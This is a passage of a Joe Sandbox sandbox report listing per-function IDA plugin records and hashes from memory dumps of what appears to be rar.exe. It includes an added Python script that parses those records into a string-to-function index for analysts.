• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: FileMoveNamePath$CompareLongShortStringswprintf
• String ID: rtmp%d
• API String ID: 2308737092-3303766350
• Opcode ID: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
• Instruction ID: cf72bd9534dfee9adcffb53273e14b9f15d353ded13e6dc32b07bcc04061cdfa
• Opcode Fuzzy Hash: de0bcd3fdd60b8f1859e4975922cee0e0ab7dbe13660142ab9f58961243ff5d4
• Instruction Fuzzy Hash: E7519523A1898744EF709B21D8406FE2351FF60795F460031F94DD7A9ADEBEE629C309
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CloseCreateEventHandle$ErrorLast
• String ID: rar -ioff
• API String ID: 4151682896-4089728129
• Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
• Instruction ID: 6e4747095d9818023d888f3878d0b80c59714f0eb3cc208d4a7bb03e3a420804
• Opcode Fuzzy Hash: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
• Instruction Fuzzy Hash: 8B014F2A96DA07C3FF14DB70E4547352352AF65702F460835F90EC6194DFAFA064CA5A
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
• API String ID: 667068680-1824683568
• Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
• Instruction ID: 859d81b0c2532842e549936dd309a0ec27b5e97b654d250f42929ceebc467cb9
• Opcode Fuzzy Hash: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
• Instruction Fuzzy Hash: 6CF06D26A4DB8681EF009B51F8402762361BF59BC0F4A5434FD1D87768EEAEE065C306
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: +$-
• API String ID: 3215553584-2137968064
• Opcode ID: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
• Instruction ID: 1c8e7afe2371451cf7d6f94dc55964aa909ef914c2b8bc950d28a4aefbd46a22
• Opcode Fuzzy Hash: 6f396bf2fa0b9258a91da6205a77601ce69ace0f3c9f84e6f9ba191af742c055
• Instruction Fuzzy Hash: 4D127227E0958345FF24A619E0443B82656EF20764FCB4632E69AC36C0DFAFE571C30A
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Backup$Read$Seek$wcschr
• String ID:
• API String ID: 2092471728-0
• Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
• Instruction ID: e83d4577728b4177a4247d49375aef17222874f4d2c7099ce7c7fda68e94f4de
• Opcode Fuzzy Hash: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
• Instruction Fuzzy Hash: 6D51823360864186EF20CF15E44026AB3A5FB94BA4F110236FE9D87B98DF7DD465CB06
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion
• String ID:
• API String ID: 2092733347-0
• Opcode ID: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
• Instruction ID: e274bf70c45b8bcc27b0889333c1cb8c5d9b61e4ce5823a69bd901d30f6154ed
• Opcode Fuzzy Hash: 783e0797a035659b3492376ae89a00853b2f1d30ad776eeab2f46d2c2c056a92
• Instruction Fuzzy Hash: 89517BB3F146518AEB54CFB4D4402AC3BB1F708789B51403AEE0E96B98EF79D565CB04
Uniqueness
Uniqueness Score: -1.00%

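The function records above (Snapshot File, API ID, String ID, API String ID, Opcode ID, fuzzy hashes, Uniqueness Score) are emitted per function by the Joe Sandbox IDA plugin and are the raw material for pivoting from a string such as kernel32 or rar -ioff to the code that references it. The following Python is an added example for this report, not Joe Sandbox code: it parses these records into structured rows, builds a string-to-function index, and checks one property the rows themselves exhibit. Two things it assumes that the page does not document: that `$` separates the individual strings in String ID and the API-name groups in API ID, and that the two numbers in API String ID hash the API ID and the String ID respectively (the second is 0 in every record with an empty String ID). The sample input is transcribed from three of the rar.exe (PID 0x3B) records above.

```python
"""Parse the per-function 'Similarity' records that Joe Sandbox's IDA plugin
emits (the blocks above) into structured rows for indexing and hunting.
Added example for this report, not Joe Sandbox code. Assumed, not documented
on the page: '$' separates the strings in 'String ID' and the API-name groups
in 'API ID'; the two numbers in 'API String ID' hash the API ID and the String
ID (the second is 0 whenever String ID is empty, as the rows above show)."""
import re
from dataclasses import dataclass, field

# Constructed sample: three records transcribed from the rar.exe (PID 0x3B)
# blocks above, with the Memory Dump Source lines left out for brevity.
SAMPLE = """\
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CloseCreateEventHandle$ErrorLast
• String ID: rar -ioff
• API String ID: 4151682896-4089728129
• Opcode ID: 1b32cc9a5b3853ccf39725862a0ac8b7945a78bb0f3e0147b511bdfad103efab
• Instruction Fuzzy Hash: 8B014F2A96DA07C3FF14DB70E4547352352AF65702F460835F90EC6194DFAFA064CA5A
Uniqueness
Uniqueness Score: -1.00%
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: SetDefaultDllDirectories$SetDllDirectoryW$kernel32
• API String ID: 667068680-1824683568
• Opcode ID: 8cf5c4d02fd6faa15582d92511ad3bd01355bb3a29212f000fb48e6594ec6bc8
• Instruction Fuzzy Hash: 6CF06D26A4DB8681EF009B51F8402762361BF59BC0F4A5434FD1D87768EEAEE065C306
Uniqueness
Uniqueness Score: -1.00%
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Backup$Read$Seek$wcschr
• String ID:
• API String ID: 2092471728-0
• Opcode ID: bf2be669b84e778a922cb721f987b286462bef24a2ee3b0e5ee0b4462bdc88cd
• Instruction Fuzzy Hash: 6D51823360864186EF20CF15E44026AB3A5FB94BA4F110236FE9D87B98DF7DD465CB06
Uniqueness
Uniqueness Score: -1.00%
"""

RECORD_START = "Joe Sandbox IDA Plugin"
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
PLAIN_FIELDS = {"Snapshot File": "snapshot", "Opcode ID": "opcode_id",
                "Instruction ID": "instruction_id", "Opcode Fuzzy Hash": "opcode_fuzzy",
                "Instruction Fuzzy Hash": "instruction_fuzzy"}


@dataclass
class FunctionRecord:
    snapshot: str = ""
    api_groups: list = field(default_factory=list)  # 'API ID' split on '$'
    strings: list = field(default_factory=list)     # 'String ID' split on '$'
    api_hash: int = 0     # first number of 'API String ID'
    string_hash: int = 0  # second number; 0 when the record lists no strings
    opcode_id: str = ""
    instruction_id: str = ""
    opcode_fuzzy: str = ""
    instruction_fuzzy: str = ""
    uniqueness: float = None  # 'Uniqueness Score', in percent


def parse_records(text: str) -> list:
    """A record starts at each 'Joe Sandbox IDA Plugin' line; bullet lines are fields."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()  # the extracted report pads every line with spaces
        if line == RECORD_START:
            cur = FunctionRecord()
            records.append(cur)
        elif cur is None:
            continue
        elif line.startswith("Uniqueness Score:"):
            cur.uniqueness = float(line.split(":", 1)[1].strip().rstrip("%"))
        elif (m := FIELD_RE.match(line)):  # headings like 'Similarity' do not match
            key, value = m.group(1).strip(), m.group(2).strip()
            if key in PLAIN_FIELDS:
                setattr(cur, PLAIN_FIELDS[key], value)
            elif key == "API ID":
                cur.api_groups = [g for g in value.split("$") if g]
            elif key == "String ID":
                cur.strings = [s for s in value.split("$") if s]
            elif key == "API String ID":
                api_part, string_part = value.split("-", 1)
                cur.api_hash, cur.string_hash = int(api_part), int(string_part)
    return records


def string_index(records: list) -> dict:
    """Inverted index: referenced string -> Opcode IDs of the functions using it."""
    index = {}
    for rec in records:
        for s in rec.strings:
            index.setdefault(s, []).append(rec.opcode_id)
    return index


def string_hash_consistent(records: list) -> bool:
    """Parse sanity check: the second 'API String ID' number is 0 exactly for
    records with an empty String ID, as this report's own rows show."""
    return all((rec.string_hash == 0) == (not rec.strings) for rec in records)
```

Feed the whole report text to `parse_records` and records without a String ID parse to an empty list rather than failing; `string_index` then answers the question an analyst actually has here, which function in the rar.exe image references kernel32 together with SetDefaultDllDirectories, by Opcode ID, so the same function can be matched across other dumps by that hash.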
APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID:
• String ID: exe$rar$rebuilt.$sfx
• API String ID: 0-13699710
• Opcode ID: 64fd0a9c721559b69046ad3ad4575efaf5bbe3996228d2347e7f21f9d6138edc
• Instruction ID: 015328c98f98a6f3ab75c1d23312ea64b67eca9c288821f462d8eac28750056a
• Opcode Fuzzy Hash: 64fd0a9c721559b69046ad3ad4575efaf5bbe3996228d2347e7f21f9d6138edc
• Instruction Fuzzy Hash: 2C81B823A1C68345EF20DB64D4153F92392FBA13C8F424131F94D876CADEAEE625C71A
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwindabort
• String ID: csm$f
• API String ID: 3913153233-629598281
• Opcode ID: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
• Instruction ID: ed572d58e0aad83ed009d4b61fa5ed12d901753a4acb474d82d22bfeab2c1a6f
• Opcode Fuzzy Hash: cb6d980e5d8e076ab593136caf69effa74300e2f691bd4e1b53b09370fd6a73c
• Instruction Fuzzy Hash: DE61D333B0865286EF18DB51E844B79A791FB747D4F168530EE0A87744DFBAE850C70A
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Security$File$DescriptorLength
• String ID: $ACL
• API String ID: 2361174398-1852320022
• Opcode ID: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
• Instruction ID: 649fbb0c60015fb75a3d88fac80f5553dee15d72173bab1d430f8bc1ccdbd4fd
• Opcode Fuzzy Hash: 99ab71e5ccbbe398f237f971ffe9b39aed517989f3bcccf534b2133dda1e344d
• Instruction Fuzzy Hash: 6231A663B0868182EF20DB11E4543E973A5FBA8784F810032FA8D83759DF7EE525C705
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: Time$File$swprintf$LocalSystem
• String ID: %u-%02u-%02u %02u:%02u$%u-%02u-%02u %02u:%02u:%02u,%09u$????-??-?? ??:??
• API String ID: 1364621626-1794493780
• Opcode ID: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
• Instruction ID: 7ef5930808ebf239dc64b3979465a68e614602d1e9ea4a381b47f25b0492b458
• Opcode Fuzzy Hash: c631e38674febfb764440a3499547548297e94e1d6d8b8a415d39587179a0b79
• Instruction Fuzzy Hash: 1821D376A182418AEB50CF64E480B9D7BF0F758794F154022FE4893B48EB7AE951CF15
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
• Opcode ID: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
• Instruction ID: 19d6f2c6021bf1e7e7a0f77f3775ae9798a62ae7ee8205c66b69e90729b937b2
• Opcode Fuzzy Hash: 62fc0dfec48af2956ca19e77247605bed92fa0407192cbb5e3de02daf22cabb6
• Instruction Fuzzy Hash: 38F0C863A1878281EF449B10F4543792360FF98780F061439F90FC2754DEBED464C705
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
• Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmp
• Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                      • Instruction ID: b4d9e4d65a26bbbeea8c3aff963bd533ffab7d52ae6a831f7095f7239bd2f2a4
                                                                                                                                                                      • Opcode Fuzzy Hash: aecc19a358617ecaa8b6bbce6cc459dc0080c4c1e8e9e85a1fab47fbb6b6c597
                                                                                                                                                                      • Instruction Fuzzy Hash: 22A1F163B0878246FF608B60C4503B92691AF64BA4F4B4635EA5D867C5DFBFE464C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                      • Instruction ID: 9def6481a328c7a95d0b3412f7321ac0d93a02899559292571c8be048c922189
                                                                                                                                                                      • Opcode Fuzzy Hash: d6b863787b9640c79ee2b1febadb7c504d9673d6b028f9ef991185c259ef8196
                                                                                                                                                                      • Instruction Fuzzy Hash: 7581DC23A1864285FF208B65D4907BC26A4BF66B88F474135FD0E87790DFBBE461C31A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
